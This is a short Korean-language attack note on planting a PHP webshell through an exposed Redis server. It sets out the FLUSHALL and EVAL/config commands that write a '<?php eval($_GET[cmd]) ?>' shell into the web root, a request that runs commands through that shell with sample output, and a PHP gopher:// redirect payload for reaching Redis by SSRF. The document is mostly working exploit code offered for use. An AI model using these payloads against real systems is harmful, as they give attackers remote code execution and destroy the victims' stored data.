redis를 통해 webshell upload

webshell upload

```bash

FLUSHALL

eval 'redis.call("set", "<?php eval($_GET[cmd]); ?>", "test");

 redis.call("config", "set", "dir", "/var/www/html/cache/");

 redis.call("config", "set", "dbfilename", "exploit.php");' 0

save

quit

```

```

http://192.168.13.133/cache/exploit.php?cmd=echo%20`ls%20-l`;

```

REDIS0008� redis-ver4.0.2� redis-bits�@�ctime�*��Y�used-mem���repl-stream-db���repl-id(b256256c124e6f5671af7f82508ead2baa3b784d�repl-offset��aof-preamble���total 8 -rw-r--r-- 1 root root 28 Oct 5 13:34 aaa.php -rw-r--r-- 1 root root 221 Oct 5 13:25 exploit.php testatest��!����~

redis EVAL / redis.call 문법

```bash

eval 'redis.call("set", "a", "test");' 0

$-1

get a

$4

test

```

redis.conf

```bash

# The filename where to dump the DB

dbfilename dump.rdb

# The working directory.

#

# The DB will be written inside this directory, with the filename specified

# above using the 'dbfilename' configuration directive.

#

# The Append Only File will also be created inside this directory.

#

# Note that you must specify a directory here, not a file name.

dir ./

```

SSRF 연계

Note ) redis는 http를 지원하지 않기 때문에, gopher를 사용해야 한다.

```php

<?php

  header("Location: gopher://127.0.0.1:6379/_FLUSHALL%0d%0aeval%20%27redis.call%28%22set%22%2C%20%22%3C%3Fphp%20eval%28%24_GET%5Bcmd%5D%29%3B%20%3F%3E%22%2C%20%22test%22%29%3B%20redis.call%28%22config%22%2C%20%22set%22%2C%20%22dir%22%2C%20%22/var/www/html/cache/%22%29%3B%20redis.call%28%22config%22%2C%20%22set%22%2C%20%22dbfilename%22%2C%20%22exploit.php%22%29%3B%27%200%0d%0asave%0d%0aquit%0d%0a");

?>

```